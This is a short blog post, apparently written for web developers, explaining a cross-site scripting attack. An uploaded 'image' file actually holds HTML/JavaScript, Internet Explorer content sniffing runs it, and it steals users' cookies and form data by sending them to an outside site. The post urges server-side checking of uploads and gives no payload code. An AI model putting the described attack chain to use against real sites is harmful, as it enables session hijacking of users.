XSS attack via unchecked image uploads

If you allow users of your website to upload data (e.g. images), and you display this data to other users, you need to open the file on the server to examine it and check that it really is what it should be (e.g. an image).

Most website software will need to examine the image anyway, to extract thumbnails, determine width/height, etc. In which case, this security comes for free. But I’ve seen software which doesn’t have any such needs, and thus server-side examination is not done.

The reason is:

  • An uploading user (attacker) may upload a file such as “xxx.jpg” whose contents are in fact HTML/Javascript rather than an image
  • The web server may serve this file with the extension in the URL and the Content-Type: image/jpeg, however…
  • Internet Explorer may under some circumstances ignore these two pieces of information, instead preferring to look at the bytes of the file, and work out what type of content the file contains
  • Even if the image looks right in the <img> tag, if the viewing user right-clicks and views the image in its own window, then the data will be interpreted as HTML/Javascript
  • This gives the file the capability to read the viewing user’s cookies, look into forms in other windows, etc., as the HTML/Javascript appears to have been served by the site the viewing user is viewing.
  • Through having e.g. <img> tags (not affected by single-source policy) the file can send e.g. GET requests to an external site and transport this cookie and form information.
  • Thus the attacker’s external site now has cookie/form information, and the attacker can use this to impersonate the user at the site.

I was unaware of this before @ch2500 brought this my attention, thanks! More information.